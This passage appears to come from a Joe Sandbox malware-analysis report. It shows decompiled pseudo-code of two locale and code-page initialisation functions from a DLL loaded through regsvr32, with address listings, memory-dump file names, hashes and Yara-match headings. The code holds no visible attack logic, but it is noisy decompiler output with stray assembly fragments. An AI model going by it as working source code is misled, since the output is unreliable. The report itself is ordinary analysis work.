                                                                      				 *((intOrPtr*)(_t300 + 0x20)) = 0xff;
                                                                      				_t34 = _t239 + 1; // 0x100
                                                                      				r8d = _t34;
                                                                      				if (E00000001180047D7C(_t260[2], _t239, __rbx, _t26,  *((intOrPtr*)(_t292 + 0x138)), __rsi, _t28) == 0) goto 0x8004d59f;
                                                                      				_t35 = _t297 + 0x81; // 0x81
                                                                      				_t37 = _t316 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t300 + 0x40)) = 0;
                                                                      				r8d = 0x200;
                                                                      				 *((intOrPtr*)(_t300 + 0x38)) =  *_t326;
                                                                      				 *((intOrPtr*)(_t300 + 0x30)) = 0xff;
                                                                      				 *((long long*)(_t300 + 0x28)) = _t35;
                                                                      				 *((intOrPtr*)(_t300 + 0x20)) = 0xff;
                                                                      				if (E00000001180047D7C(E00000001180047D7C(_t260[2], _t239, __rbx, _t26,  *((intOrPtr*)(_t292 + 0x138)), __rsi, _t28), _t239, _t252, _t35,  *((intOrPtr*)(_t292 + 0x138)), _t294, _t37) == 0) goto 0x8004d59f;
                                                                      				_t43 = _t319 + 0x100; // 0x100
                                                                      				_t264 = _t43;
                                                                      				 *((intOrPtr*)(_t300 + 0x30)) = 0;
                                                                      				r9d = 0x100;
                                                                      				 *((intOrPtr*)(_t300 + 0x28)) =  *_t326;
                                                                      				 *((long long*)(_t300 + 0x60)) = _t264;
                                                                      				 *((long long*)(_t300 + 0x20)) = _t264;
                                                                      				if (E00000001180047BA8(_t199, E00000001180047D7C(E00000001180047D7C(_t260[2], _t239, __rbx, _t26,  *((intOrPtr*)(_t292 + 0x138)), __rsi, _t28), _t239, _t252, _t35,  *((intOrPtr*)(_t292 + 0x138)), _t294, _t37), _t252, _t264, _t292, _t294, _t316, _t310) == 0) goto 0x8004d59f;
                                                                      				_t48 = _t319 + 0xfe; // 0xfe
                                                                      				_t240 = _t48;
                                                                      				 *_t240 = 0;
                                                                      				 *((char*)(_t323 + 0x7f)) = 0;
                                                                      				 *((char*)(_t297 + 0x7f)) = 0;
                                                                      				 *((char*)(_t323 + 0x80)) = 0;
                                                                      				 *((char*)(_t297 + 0x80)) = 0;
                                                                      				 *((long long*)(_t300 + 0x68)) = _t240;
                                                                      				if ( *(_t300 + 0x50) - _t199 <= 0) goto 0x8004d350;
                                                                      				if ( *_t326 != 0xfde9) goto 0x8004d2fc;
                                                                      				_t55 = _t297 + 0x100; // 0x100
                                                                      				_t304 = _t55;
                                                                      				_t56 = _t319 + 0x200; // 0x200
                                                                      				r11d = 0x8000;
                                                                      				_t187 =  >  ? 0 : r11d;
                                                                      				 *_t56 =  >  ? 0 : r11d;
                                                                      				 *((char*)(_t323 - _t297 + _t304)) = 0x20;
                                                                      				 *_t304 = 0x80;
                                                                      				if (0x80 + _t199 - 0xff <= 0) goto 0x8004d2ce;
                                                                      				goto 0x8004d350;
                                                                      				_t289 = _t300 + 0x86;
                                                                      				if ( *((intOrPtr*)(_t300 + 0x86)) == 0) goto 0x8004d350;
                                                                      				r11d = 0x8000;
                                                                      				if (_t289[1] == 0) goto 0x8004d350;
                                                                      				_t188 =  *_t289 & 0x000000ff;
                                                                      				if (_t188 - (_t289[1] & 0x000000ff) > 0) goto 0x8004d348;
                                                                      				_t241 = _t188;
                                                                      				 *((intOrPtr*)(_t319 + 0x100 + _t241 * 2)) = r11w;
                                                                      				 *(_t241 + _t323 + 0x80) = _t188;
                                                                      				 *(_t241 + _t297 + 0x80) = _t188;
                                                                      				if (_t188 + _t199 - (_t289[1] & 0x000000ff) <= 0) goto 0x8004d323;
                                                                      				if (_t289[2] != 0) goto 0x8004d313;
                                                                      				_t72 = _t319 + 0x200; // 0x200
                                                                      				asm("movups xmm0, [ecx]");
                                                                      				asm("movups xmm1, [ecx+0x10]");
                                                                      				_t266 = _t72 + 0x80;
                                                                      				asm("inc ecx");
                                                                      				_t242 =  *((intOrPtr*)(_t266 + 0x70));
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx-0x60]");
                                                                      				asm("movups xmm1, [ecx-0x50]");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx-0x40]");
                                                                      				asm("movups xmm1, [ecx-0x30]");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx-0x20]");
                                                                      				asm("movups xmm1, [ecx-0x10]");
                                                                      				asm("inc ecx");
                                                                      				_t320 = _t319 - 0xffffff80;
                                                                      				asm("movups xmm0, [ecx]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [ecx+0x10]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx+0x20]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [ecx+0x30]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx+0x40]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [ecx+0x50]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [ecx+0x60]");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				 *((long long*)(_t320 + 0x70)) =  *((intOrPtr*)(_t266 + 0x70));
                                                                      				 *((intOrPtr*)(_t320 + 0x78)) =  *((intOrPtr*)(_t266 + 0x78));
                                                                      				 *((short*)(_t320 + 0x7c)) =  *(_t266 + 0x7c) & 0x0000ffff;
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("repne inc ecx");
                                                                      				asm("inc ecx");
                                                                      				asm("repne inc ecx");
                                                                      				 *((intOrPtr*)(_t323 + 0x78)) =  *((intOrPtr*)(_t323 + 0x178));
                                                                      				 *((short*)(_t323 + 0x7c)) =  *(_t323 + 0x17c) & 0x0000ffff;
                                                                      				 *((char*)(_t323 + 0x7e)) =  *((intOrPtr*)(_t323 + 0x17e));
                                                                      				asm("movups xmm0, [ebp+0x100]");
                                                                      				asm("movups xmm1, [ebp+0x110]");
                                                                      				asm("movups [ebp], xmm0");
                                                                      				asm("movups xmm0, [ebp+0x120]");
                                                                      				asm("movups [ebp+0x10], xmm1");
                                                                      				asm("movups xmm1, [ebp+0x130]");
                                                                      				asm("movups [ebp+0x20], xmm0");
                                                                      				asm("movups xmm0, [ebp+0x140]");
                                                                      				asm("movups [ebp+0x30], xmm1");
                                                                      				asm("movups xmm1, [ebp+0x150]");
                                                                      				asm("movups [ebp+0x40], xmm0");
                                                                      				asm("movups xmm0, [ebp+0x160]");
                                                                      				asm("movups [ebp+0x50], xmm1");
                                                                      				asm("movsd xmm1, [ebp+0x170]");
                                                                      				asm("movups [ebp+0x60], xmm0");
                                                                      				asm("movsd [ebp+0x70], xmm1");
                                                                      				 *((intOrPtr*)(_t297 + 0x78)) =  *((intOrPtr*)(_t297 + 0x178));
                                                                      				 *((short*)(_t297 + 0x7c)) =  *(_t297 + 0x17c) & 0x0000ffff;
                                                                      				_t156 =  *((intOrPtr*)(_t297 + 0x17e));
                                                                      				 *(_t297 + 0x7e) = _t156;
                                                                      				if ( *((intOrPtr*)(_t292 + 0x100)) == 0) goto 0x8004d558;
                                                                      				asm("lock xadd [ecx], eax");
                                                                      				if ((_t156 | 0xffffffff) != _t199) goto 0x8004d558;
                                                                      				E0000000118003A674( *((intOrPtr*)(_t266 + 0x70)),  *((intOrPtr*)(_t292 + 0x108)) - 0xfe);
                                                                      				E0000000118003A674( *((intOrPtr*)(_t266 + 0x70)),  *((intOrPtr*)(_t292 + 0x110)) + 0xffffff80);
                                                                      				E0000000118003A674( *((intOrPtr*)(_t266 + 0x70)),  *((intOrPtr*)(_t292 + 0x118)) + 0xffffff80);
                                                                      				E0000000118003A674(_t242,  *((intOrPtr*)(_t292 + 0x100)));
                                                                      				_t243 =  *(_t300 + 0x58);
                                                                      				 *_t243 = _t199;
                                                                      				 *((long long*)(_t292 + 0x100)) = _t243;
                                                                      				 *_t292 =  *((intOrPtr*)(_t300 + 0x60));
                                                                      				 *((long long*)(_t292 + 0x108)) =  *((intOrPtr*)(_t300 + 0x68));
                                                                      				_t102 = _t323 + 0x80; // 0x80
                                                                      				 *((long long*)(_t292 + 0x110)) = _t102;
                                                                      				_t104 = _t297 + 0x80; // 0x80
                                                                      				_t247 = _t104;
                                                                      				 *((long long*)(_t292 + 0x118)) = _t104;
                                                                      				 *(_t292 + 8) =  *(_t300 + 0x50);
                                                                      				goto 0x8004d5c3;
                                                                      				E0000000118003A674(_t104,  *(_t300 + 0x58));
                                                                      				E0000000118003A674(_t104, _t320);
                                                                      				E0000000118003A674(_t104, _t323);
                                                                      				E0000000118003A674(_t247, _t297);
                                                                      				_t279 = _t316;
                                                                      				E0000000118003A674(_t247, _t279);
                                                                      				goto 0x8004d61c;
                                                                      				if ( *((intOrPtr*)(_t279 + 0x100)) == 0) goto 0x8004d5de;
                                                                      				asm("lock dec dword [eax]");
                                                                      				 *((long long*)(_t279 + 0x100)) = _t252;
                                                                      				 *_t279 = 0x800608c0;
                                                                      				 *((long long*)(_t279 + 0x108)) = _t252;
                                                                      				 *((long long*)(_t279 + 0x110)) = 0x80060b40;
                                                                      				 *((long long*)(_t279 + 0x118)) = 0x80060cc0;
                                                                      				 *((intOrPtr*)(_t279 + 8)) = 1;
                                                                      				return E00000001180002FB0(0, _t188 + _t199,  *(_t300 + 0x98) ^ _t300);
                                                                      			}




































                                                                      0x18004cfec
                                                                      0x18004cfec
                                                                      0x18004cfec
                                                                      0x18004cfec
                                                                      0x18004cfec
                                                                      0x18004cfef
                                                                      0x18004cff3
                                                                      0x18004cff7
                                                                      0x18004d004
                                                                      0x18004d00b
                                                                      0x18004d012
                                                                      0x18004d015
                                                                      0x18004d01d
                                                                      0x18004d026
                                                                      0x18004d02a
                                                                      0x18004d02d
                                                                      0x18004d031
                                                                      0x18004d034
                                                                      0x18004d039
                                                                      0x18004d03f
                                                                      0x18004d045
                                                                      0x18004d049
                                                                      0x18004d04e
                                                                      0x18004d04e
                                                                      0x18004d054
                                                                      0x18004d058
                                                                      0x18004d05d
                                                                      0x18004d06e
                                                                      0x18004d079
                                                                      0x18004d07c
                                                                      0x18004d083
                                                                      0x18004d099
                                                                      0x18004d0a0
                                                                      0x18004d0ad
                                                                      0x18004d0b4
                                                                      0x18004d0c1
                                                                      0x18004d0c8
                                                                      0x18004d0d8
                                                                      0x18004d0df
                                                                      0x18004d0e2
                                                                      0x18004d0ec
                                                                      0x18004d0f5
                                                                      0x18004d0fe
                                                                      0x18004d107
                                                                      0x18004d110
                                                                      0x18004d11b
                                                                      0x18004d127
                                                                      0x18004d13c
                                                                      0x18004d14a
                                                                      0x18004d150
                                                                      0x18004d158
                                                                      0x18004d15e
                                                                      0x18004d167
                                                                      0x18004d169
                                                                      0x18004d171
                                                                      0x18004d179
                                                                      0x18004d17e
                                                                      0x18004d180
                                                                      0x18004d18f
                                                                      0x18004d194
                                                                      0x18004d196
                                                                      0x18004d19f
                                                                      0x18004d1a1
                                                                      0x18004d1a6
                                                                      0x18004d1b1
                                                                      0x18004d1b9
                                                                      0x18004d1be
                                                                      0x18004d1cc
                                                                      0x18004d1d1
                                                                      0x18004d1d5
                                                                      0x18004d1de
                                                                      0x18004d1e2
                                                                      0x18004d1e9
                                                                      0x18004d1ed
                                                                      0x18004d1ed
                                                                      0x18004d1f8
                                                                      0x18004d201
                                                                      0x18004d20f
                                                                      0x18004d214
                                                                      0x18004d218
                                                                      0x18004d21e
                                                                      0x18004d227
                                                                      0x18004d22b
                                                                      0x18004d232
                                                                      0x18004d23d
                                                                      0x18004d246
                                                                      0x18004d246
                                                                      0x18004d24d
                                                                      0x18004d251
                                                                      0x18004d257
                                                                      0x18004d25e
                                                                      0x18004d265
                                                                      0x18004d273
                                                                      0x18004d279
                                                                      0x18004d279
                                                                      0x18004d280
                                                                      0x18004d283
                                                                      0x18004d287
                                                                      0x18004d28a
                                                                      0x18004d291
                                                                      0x18004d297
                                                                      0x18004d2a0
                                                                      0x18004d2ad
                                                                      0x18004d2b2
                                                                      0x18004d2b2
                                                                      0x18004d2bc
                                                                      0x18004d2c8
                                                                      0x18004d2da
                                                                      0x18004d2de
                                                                      0x18004d2e6
                                                                      0x18004d2ea
                                                                      0x18004d2f8
                                                                      0x18004d2fa
                                                                      0x18004d2fc
                                                                      0x18004d30b
                                                                      0x18004d30d
                                                                      0x18004d316
                                                                      0x18004d318
                                                                      0x18004d321
                                                                      0x18004d323
                                                                      0x18004d326
                                                                      0x18004d32f
                                                                      0x18004d337
                                                                      0x18004d346
                                                                      0x18004d34e
                                                                      0x18004d350
                                                                      0x18004d357
                                                                      0x18004d35a
                                                                      0x18004d35e
                                                                      0x18004d365
                                                                      0x18004d36a
                                                                      0x18004d36e
                                                                      0x18004d373
                                                                      0x18004d377
                                                                      0x18004d37b
                                                                      0x18004d380
                                                                      0x18004d385
                                                                      0x18004d389
                                                                      0x18004d38d
                                                                      0x18004d392
                                                                      0x18004d397
                                                                      0x18004d39b
                                                                      0x18004d39f
                                                                      0x18004d3a4
                                                                      0x18004d3a8
                                                                      0x18004d3ab
                                                                      0x18004d3b0
                                                                      0x18004d3b4
                                                                      0x18004d3b9
                                                                      0x18004d3bd
                                                                      0x18004d3c2
                                                                      0x18004d3c6
                                                                      0x18004d3cb
                                                                      0x18004d3cf
                                                                      0x18004d3d4
                                                                      0x18004d3d8
                                                                      0x18004d3dd
                                                                      0x18004d3e1
                                                                      0x18004d3e6
                                                                      0x18004d3eb
                                                                      0x18004d3f2
                                                                      0x18004d3fa
                                                                      0x18004d406
                                                                      0x18004d40e
                                                                      0x18004d416
                                                                      0x18004d41a
                                                                      0x18004d422
                                                                      0x18004d427
                                                                      0x18004d42f
                                                                      0x18004d434
                                                                      0x18004d43c
                                                                      0x18004d441
                                                                      0x18004d449
                                                                      0x18004d44e
                                                                      0x18004d456
                                                                      0x18004d45b
                                                                      0x18004d464
                                                                      0x18004d469
                                                                      0x18004d46f
                                                                      0x18004d47b
                                                                      0x18004d487
                                                                      0x18004d48b
                                                                      0x18004d498
                                                                      0x18004d49f
                                                                      0x18004d4a3
                                                                      0x18004d4aa
                                                                      0x18004d4ae
                                                                      0x18004d4b5
                                                                      0x18004d4b9
                                                                      0x18004d4c0
                                                                      0x18004d4c4
                                                                      0x18004d4cb
                                                                      0x18004d4cf
                                                                      0x18004d4d6
                                                                      0x18004d4da
                                                                      0x18004d4e2
                                                                      0x18004d4e6
                                                                      0x18004d4eb
                                                                      0x18004d4f5
                                                                      0x18004d4f9
                                                                      0x18004d4ff
                                                                      0x18004d50c
                                                                      0x18004d511
                                                                      0x18004d517
                                                                      0x18004d527
                                                                      0x18004d537
                                                                      0x18004d547
                                                                      0x18004d553
                                                                      0x18004d558
                                                                      0x18004d55d
                                                                      0x18004d55f
                                                                      0x18004d56b
                                                                      0x18004d573
                                                                      0x18004d57a
                                                                      0x18004d581
                                                                      0x18004d588
                                                                      0x18004d588
                                                                      0x18004d58f
                                                                      0x18004d59a
                                                                      0x18004d59d
                                                                      0x18004d5a4
                                                                      0x18004d5ac
                                                                      0x18004d5b4
                                                                      0x18004d5bc
                                                                      0x18004d5c3
                                                                      0x18004d5c6
                                                                      0x18004d5cd
                                                                      0x18004d5d9
                                                                      0x18004d5db
                                                                      0x18004d5e5
                                                                      0x18004d5ec
                                                                      0x18004d5fb
                                                                      0x18004d602
                                                                      0x18004d610
                                                                      0x18004d619
                                                                      0x18004d64c

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-0
                                                                      • Opcode ID: a6ab4201f3a2b51943a7bb6b141823c3a47a5748179d89ac1bc64aea19b73088
                                                                      • Instruction ID: 3a3dd2c11b34725f15476970c44ab8ab57f8180491d899cc20aa4fb0acd58680
                                                                      • Opcode Fuzzy Hash: a6ab4201f3a2b51943a7bb6b141823c3a47a5748179d89ac1bc64aea19b73088
                                                                      • Instruction Fuzzy Hash: 6E129072A18BC886E792CF2894557ED73A4F76D788F06D216EF9883652DF35D288C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E0000000118004E9B0(intOrPtr* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r10, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _v40;
                                                                      				signed int _v48;
                                                                      				char _v56;
                                                                      				long long _v72;
                                                                      				void* _t114;
                                                                      				void* _t120;
                                                                      				signed int _t152;
                                                                      				char _t182;
                                                                      				char _t183;
                                                                      				long long _t213;
                                                                      				intOrPtr* _t224;
                                                                      				intOrPtr* _t242;
                                                                      				char* _t296;
                                                                      				char* _t297;
                                                                      				long long _t302;
                                                                      				char* _t330;
                                                                      				void* _t332;
                                                                      				long long _t335;
                                                                      				void* _t336;
                                                                      				intOrPtr* _t337;
                                                                      				long long _t339;
                                                                      				signed long long _t340;
                                                                      				long long _t341;
                                                                      
                                                                      				_t333 = __r10;
                                                                      				_t332 = __r9;
                                                                      				_t224 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_a24 = __rdi;
                                                                      				r15d = 0;
                                                                      				_v56 = __rcx;
                                                                      				_v48 = _v48 & _t340;
                                                                      				_t302 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x140)) != _t340) goto 0x8004e9fe;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x148)) != _t340) goto 0x8004e9fe;
                                                                      				r12d = 0;
                                                                      				goto 0x8004ee6e;
                                                                      				r13d = 1;
                                                                      				E0000000118003C1F4(_t114, __rcx, __rdx, __r10);
                                                                      				_t339 = _t224;
                                                                      				E0000000118003A674(_t224, __rcx);
                                                                      				if (_t339 != 0) goto 0x8004ea28;
                                                                      				goto 0x8004eec4;
                                                                      				E0000000118003C1F4(r13d, _t336, __rdx, __r10);
                                                                      				_t335 = _t224;
                                                                      				E0000000118003A674(_t224, _t336);
                                                                      				if (_t335 != 0) goto 0x8004ea50;
                                                                      				_t120 = E0000000118003A674(_t224, _t339);
                                                                      				goto 0x8004ea20;
                                                                      				if ( *((intOrPtr*)(_t302 + 0x140)) == _t340) goto 0x8004edab;
                                                                      				E0000000118003C1F4(_t120, _t336, __rbx, __r10);
                                                                      				_t341 = _t224;
                                                                      				E0000000118003A674(_t224, _t336);
                                                                      				_t213 = _t341;
                                                                      				if (_t213 != 0) goto 0x8004ea84;
                                                                      				E0000000118003A674(_t224, _t339);
                                                                      				goto 0x8004ea49;
                                                                      				_t299 =  *((intOrPtr*)(_t302 + 0x140));
                                                                      				_t11 = _t339 + 0x18; // 0x18
                                                                      				_v72 = _t11;
                                                                      				r9d = 0x15;
                                                                      				_t13 =  &_v56; // -15
                                                                      				E00000001180059A0C(r13d, _t13,  *((intOrPtr*)(_t302 + 0x140)), __r10);
                                                                      				_t14 = _t339 + 0x20; // 0x20
                                                                      				r9d = 0x14;
                                                                      				_v72 = _t14;
                                                                      				_t16 =  &_v56; // -15
                                                                      				E00000001180059A0C(r13d, _t16,  *((intOrPtr*)(_t302 + 0x140)), _t333);
                                                                      				_t17 = _t339 + 0x28; // 0x28
                                                                      				r9d = 0x16;
                                                                      				_v72 = _t17;
                                                                      				_t19 =  &_v56; // -15
                                                                      				E00000001180059A0C(r13d, _t19,  *((intOrPtr*)(_t302 + 0x140)), _t333);
                                                                      				_t20 =  &_v56; // -15
                                                                      				_t21 = _t339 + 0x30; // 0x30
                                                                      				r9d = 0x17;
                                                                      				_v72 = _t21;
                                                                      				E00000001180059A0C(r13d, _t20, _t299, _t333);
                                                                      				r9d = 0x18;
                                                                      				_t23 = _t339 + 0x38; // 0x38
                                                                      				_t337 = _t23;
                                                                      				_v72 = _t337;
                                                                      				_t25 =  &_v56; // -15
                                                                      				E00000001180059A0C(_t332 - 0x17, _t25, _t299, _t333);
                                                                      				r9d = 0x50;
                                                                      				_t27 =  &_v56; // -15
                                                                      				_t28 = _t339 + 0x40; // 0x40
                                                                      				_v72 = _t28;
                                                                      				E00000001180059A0C(_t332 - 0x4f, _t27, _t299, _t333);
                                                                      				r9d = 0x51;
                                                                      				_t31 =  &_v56; // -15
                                                                      				_t32 = _t339 + 0x48; // 0x48
                                                                      				_v72 = _t32;
                                                                      				E00000001180059A0C(_t332 - 0x50, _t31, _t299, _t333);
                                                                      				_t35 =  &_v56; // -15
                                                                      				_t36 = _t339 + 0x50; // 0x50
                                                                      				r9d = 0x1a;
                                                                      				_v72 = _t36;
                                                                      				E00000001180059A0C(0, _t35, _t299, _t333);
                                                                      				_t38 =  &_v56; // -15
                                                                      				_t39 = _t339 + 0x51; // 0x51
                                                                      				r9d = 0x19;
                                                                      				_v72 = _t39;
                                                                      				E00000001180059A0C(0, _t38, _t299, _t333);
                                                                      				_t41 =  &_v56; // -15
                                                                      				_t42 = _t339 + 0x52; // 0x52
                                                                      				r9d = 0x54;
                                                                      				_v72 = _t42;
                                                                      				E00000001180059A0C(0, _t41, _t299, _t333);
                                                                      				_t44 = _t339 + 0x53; // 0x53
                                                                      				r9d = 0x55;
                                                                      				_v72 = _t44;
                                                                      				_t46 =  &_v56; // -15
                                                                      				E00000001180059A0C(0, _t46, _t299, _t333);
                                                                      				_t47 =  &_v56; // -15
                                                                      				_t48 = _t339 + 0x54; // 0x54
                                                                      				r9d = 0x56;
                                                                      				_v72 = _t48;
                                                                      				E00000001180059A0C(0, _t47, _t299, _t333);
                                                                      				_t50 =  &_v56; // -15
                                                                      				_t51 = _t339 + 0x55; // 0x55
                                                                      				r9d = 0x57;
                                                                      				_v72 = _t51;
                                                                      				E00000001180059A0C(0, _t50, _t299, _t333);
                                                                      				_t53 =  &_v56; // -15
                                                                      				_t54 = _t339 + 0x56; // 0x56
                                                                      				r9d = 0x52;
                                                                      				_v72 = _t54;
                                                                      				E00000001180059A0C(0, _t53, _t299, _t333);
                                                                      				_t56 =  &_v56; // -15
                                                                      				_t57 = _t339 + 0x57; // 0x57
                                                                      				r9d = 0x53;
                                                                      				_v72 = _t57;
                                                                      				E00000001180059A0C(0, _t56, _t299, _t333);
                                                                      				r9d = 0x15;
                                                                      				_t59 =  &_v56; // -15
                                                                      				_t60 = _t339 + 0x68; // 0x68
                                                                      				_v72 = _t60;
                                                                      				E00000001180059A0C(_t332 - 0x13, _t59, _t299, _t333);
                                                                      				r9d = 0x14;
                                                                      				_t63 =  &_v56; // -15
                                                                      				_t64 = _t339 + 0x70; // 0x70
                                                                      				_v72 = _t64;
                                                                      				E00000001180059A0C(_t332 - 0x12, _t63, _t299, _t333);
                                                                      				r9d = 0x16;
                                                                      				_t67 =  &_v56; // -15
                                                                      				_t68 = _t339 + 0x78; // 0x78
                                                                      				_v72 = _t68;
                                                                      				E00000001180059A0C(_t332 - 0x14, _t67, _t299, _t333);
                                                                      				r9d = 0x17;
                                                                      				_t71 =  &_v56; // -15
                                                                      				_t72 = _t339 + 0x80; // 0x80
                                                                      				_v72 = _t72;
                                                                      				E00000001180059A0C(_t332 - 0x15, _t71, _t299, _t333);
                                                                      				r9d = 0x50;
                                                                      				_t75 =  &_v56; // -15
                                                                      				_t76 = _t339 + 0x88; // 0x88
                                                                      				_v72 = _t76;
                                                                      				E00000001180059A0C(_t332 - 0x4e, _t75, _t299, _t333);
                                                                      				_t79 = _t339 + 0x90; // 0x90
                                                                      				_t242 = _t79;
                                                                      				r9d = 0x51;
                                                                      				_v72 = _t242;
                                                                      				_t81 =  &_v56; // -15
                                                                      				E00000001180059A0C(_t332 - 0x4f, _t81, _t299, _t333);
                                                                      				if (_t213 == 0) goto 0x8004ed61;
                                                                      				E0000000118004EEE4(_t339);
                                                                      				E0000000118003A674(_t242, _t339);
                                                                      				E0000000118003A674(_t242, _t335);
                                                                      				E0000000118003A674(_t242, _t341);
                                                                      				goto 0x8004eec4;
                                                                      				_t296 =  *_t337;
                                                                      				if ( *_t296 == 0) goto 0x8004ee13;
                                                                      				_t83 = _t242 - 0x30; // -48
                                                                      				_t182 = _t83;
                                                                      				if (_t182 - 9 > 0) goto 0x8004ed8d;
                                                                      				 *_t296 = _t182;
                                                                      				r13d = 1;
                                                                      				_t297 = _t296 + _t337;
                                                                      				_t152 =  *_t297;
                                                                      				if (_t152 != 0) goto 0x8004ed6f;
                                                                      				goto 0x8004ee19;
                                                                      				if (_t152 != 0x3b) goto 0x8004ed79;
                                                                      				_t330 = _t297;
                                                                      				_t183 =  *((intOrPtr*)(_t330 + 1));
                                                                      				 *_t330 = _t183;
                                                                      				if (_t183 != 0) goto 0x8004ed94;
                                                                      				r13d = 1;
                                                                      				goto 0x8004ed82;
                                                                      				asm("movups xmm0, [eax]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [eax+0x10]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [eax+0x20]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [eax+0x30]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [eax+0x40]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [eax+0x50]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [eax+0x60]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm0, [eax+0x70]");
                                                                      				asm("inc ecx");
                                                                      				asm("movups xmm1, [eax+edx]");
                                                                      				asm("inc ecx");
                                                                      				 *((long long*)(_t339 + _t297 + 0x10)) =  *((intOrPtr*)(0x80072900 + _t297 + 0x10));
                                                                      				goto 0x8004ee19;
                                                                      				r13d = 1;
                                                                      				 *_t339 =  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xf8))));
                                                                      				 *((long long*)(_t339 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xf8)) + 8));
                                                                      				 *((long long*)(_t339 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xf8)) + 0x10));
                                                                      				 *((long long*)(_t339 + 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xf8)) + 0x58));
                                                                      				 *((long long*)(_t339 + 0x60)) =  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xf8)) + 0x60));
                                                                      				 *_t335 = r13d;
                                                                      				if (_t341 == 0) goto 0x8004ee6e;
                                                                      				 *_t341 = r13d;
                                                                      				if ( *((intOrPtr*)(_t302 + 0xf0)) == 0) goto 0x8004ee7d;
                                                                      				asm("lock dec dword [eax]");
                                                                      				if ( *((intOrPtr*)(_t302 + 0xe0)) == 0) goto 0x8004eead;
                                                                      				asm("lock xadd [ecx], eax");
                                                                      				if ((_t152 | 0xffffffff) != 1) goto 0x8004eead;
                                                                      				E0000000118003A674( *((intOrPtr*)(_t302 + 0xf0)),  *((intOrPtr*)(_t302 + 0xf8)));
                                                                      				E0000000118003A674( *((intOrPtr*)(_t302 + 0xf0)),  *((intOrPtr*)(_t302 + 0xe0)));
                                                                      				 *((long long*)(_t302 + 0xf0)) = _t341;
                                                                      				 *((long long*)(_t302 + 0xe0)) = _t335;
                                                                      				 *((long long*)(_t302 + 0xf8)) = _t339;
                                                                      				return 0;
                                                                      			}


























                                                                      0x18004e9b0
                                                                      0x18004e9b0
                                                                      0x18004e9b0
                                                                      0x18004e9b0
                                                                      0x18004e9b5
                                                                      0x18004e9ba
                                                                      0x18004e9cf
                                                                      0x18004e9d2
                                                                      0x18004e9d6
                                                                      0x18004e9da
                                                                      0x18004e9e4
                                                                      0x18004e9ed
                                                                      0x18004e9ef
                                                                      0x18004e9f9
                                                                      0x18004e9fe
                                                                      0x18004ea0c
                                                                      0x18004ea13
                                                                      0x18004ea16
                                                                      0x18004ea1e
                                                                      0x18004ea23
                                                                      0x18004ea32
                                                                      0x18004ea39
                                                                      0x18004ea3c
                                                                      0x18004ea44
                                                                      0x18004ea49
                                                                      0x18004ea4e
                                                                      0x18004ea57
                                                                      0x18004ea63
                                                                      0x18004ea6a
                                                                      0x18004ea6d
                                                                      0x18004ea72
                                                                      0x18004ea75
                                                                      0x18004ea7a
                                                                      0x18004ea82
                                                                      0x18004ea84
                                                                      0x18004ea8b
                                                                      0x18004ea92
                                                                      0x18004ea97
                                                                      0x18004ea9d
                                                                      0x18004eaa4
                                                                      0x18004eaa9
                                                                      0x18004eaad
                                                                      0x18004eab3
                                                                      0x18004eabb
                                                                      0x18004eac4
                                                                      0x18004eac9
                                                                      0x18004eacd
